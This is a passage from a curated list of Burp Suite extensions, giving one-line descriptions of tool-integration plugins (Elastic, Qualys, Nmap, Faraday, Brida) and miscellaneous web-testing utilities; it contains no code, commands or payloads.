burp-suite-swaggy – Burp Suite extension for parsing Swagger web service definition files.
Tool Integration
Extensions related to integrating Burp Suite with other software/tools.
Report To Elastic Search – This extension passes along issues discovered by Burp to either stdout or an ElasticSearch database.
Qualys WAS – The Qualys WAS Burp extension provides a way to easily push Burp scanner findings to the Web Application Scanning (WAS) module within the Qualys Cloud Platform.
NMAP Parser – This extension provides a GUI interface for parsing Nmap output files, and adding common web application ports to Burp’s target scope.
WebInspect Connector – Binary-only repository for the HP WebInspect Connector, authored by HP.
Faraday – This extension integrates Burp with the Faraday Integrated Penetration-Test Environment.
Git Bridge – This extension lets Burp users store Burp data and collaborate via git. Users can right-click supported items in Burp to send them to a git repo and use the Git Bridge tab to send items back to the originating Burp tools.
Issue Poster – This extension can be used to post details of discovered Scanner issues to an external web service.
Code Dx – This extension uploads scan reports directly to CodeDx, a software vulnerability correlation and management system.
ElasticBurp – This extension stores requests and responses from selected Burp tools in an ElasticSearch index including metadata like headers and parameters.
Dradis Framework – This extension integrates Burp with the Dradis Framework.
Pcap Importer – This extension enables Pcap and Pcap-NG files to be imported into the Burp Target site map, and passively scanned.
Brida – Brida is a Burp Suite Extension that, working as a bridge between Burp Suite and Frida, lets you use and manipulate applications’ own methods while tampering the traffic exchanged between the applications and their back-end services/servers.
Burp Chat – This extension enables collaborative usage of Burp using XMPP/Jabber. You can send items between Burp instances by connecting over a chat session.
ThreadFix – This extension provides an interface between Burp and ThreadFix.
Nessus Loader – his extension parses a Nessus scan XML file to detect web servers. Any web servers discovered are added to the site map.
Peach API Integration – This Burp plugin provides integration between Burp and Peach API Security.
YesWeBurp – YesWeBurp is an extension for BurpSuite allowing you to access all your https://yeswehack.com/ bug bounty programs directly inside Burp.
Misc
knife – A burp extension that add some useful function to Context Menu. This includes one key to update cookie, one key add host to scope to the right click context menu, insert payload of Hackbar or self-configured to current request.
Burp Rest API – REST/JSON API to the Burp Suite security tool.
Burp Bing translator – Testing non-English web apps is pretty straight forward which you can just use browser extension to translate what you see on screens.
Similar Request Excluder – A Burp Suite extension that automatically marks similar requests as ‘out-of-scope’.
Add Custom Header – A Burp Suite extension to add a custom header (e.g. JWT).
Target Redirector – This extension allows you to redirect requests to a particular target by replacing an incorrect target hostname/IP with the intended one. The Host header can optionally also be updated.
Similar Request Excluder – Similar Request Excluder is an extension that enables you to automatically reduce the target scope of your active scan by excluding similar (and therefore redundant) requests.
Request Timer – This extension captures response times for requests made by all Burp tools. It could be useful in uncovering potential timing attacks.
Response Clusterer – This extension clusters similar responses together, and shows a summary with one request/response per cluster. This allows the tester to get an overview of the tested website’s responses from all Burp Suite tools.
HUNT – HUNT Suite is a collection of Burp Suite Pro/Free and OWASP ZAP extensions. Identifies common parameters vulnerable to certain vulnerability classes (Burp Suite Pro and OWASP ZAP). Organize testing methodologies (Burp Suite Pro and Free).
Replicator – Replicator helps developers to reproduce issues discovered by pen testers.
Kerberos Authentication – This extension provides support for performing Kerberos authentication. This is useful for testing in a Windows domain when NTLM authentication is not supported.
JVM Property Editor – This extension allows the user to view and modify JVM system properties while Burp is running.
Lair – This extension provides the facility to send Burp Scanner issues directly to a remote Lair project.
Google Authenticator – This Burp Suite extension turns Burp into a Google Authenticator client.
GWT Insertion Points – This extension automatically identifies insertion points for GWT (Google Web Toolkit) requests when sending them to the active Scanner or Burp Intruder.
Headless Burp – This extension allows you to run Burp Suite’s Spider and Scanner tools in headless mode via the command-line.
HTTP Mock – This Burp extension provides mock responses that can be customized, based on the real ones.
Carbonator – This extension provides a command-line interface to automate the process of configuring target scope, spidering and scanning.
Batch Scan Report Generator – This extension can be used to generate multiple scan reports by host with just a few clicks.
Decompressor – Often, HTTP traffic is compressed by the server before it is sent to the client in order to reduce network load.
Custom Parameter Handler – This extension provides a simple way to modify any part of an HTTP message, allowing manipulation with surgical precision even (and especially) when using macros.
Proxy Auto Config – This extension automatically configures Burp upstream proxies to match desktop proxy settings.
Proxy Action Rules – This extension can automatically forward, intercept, and drop proxy requests while actively displaying proxy log information and centralizing list management.
Perfmon – Perfmon is an extension for Burp Suite that shows information about threads, memory being used, and memory allocated.
Unicode To Chinese – A burpsuite Extender That Convert Unicode To Chinese.
Curlit – Burp Python plugin to turn requests into curl commands.
BurpSuite-Team-Extension – This Burpsuite plugin allows for multiple web app testers to share their proxy history with each other in real time.
BurpelFish – Adds Google Translate to Burp’s context menu.
BlockerLite – Simple Burp extension to drop blacklisted hosts.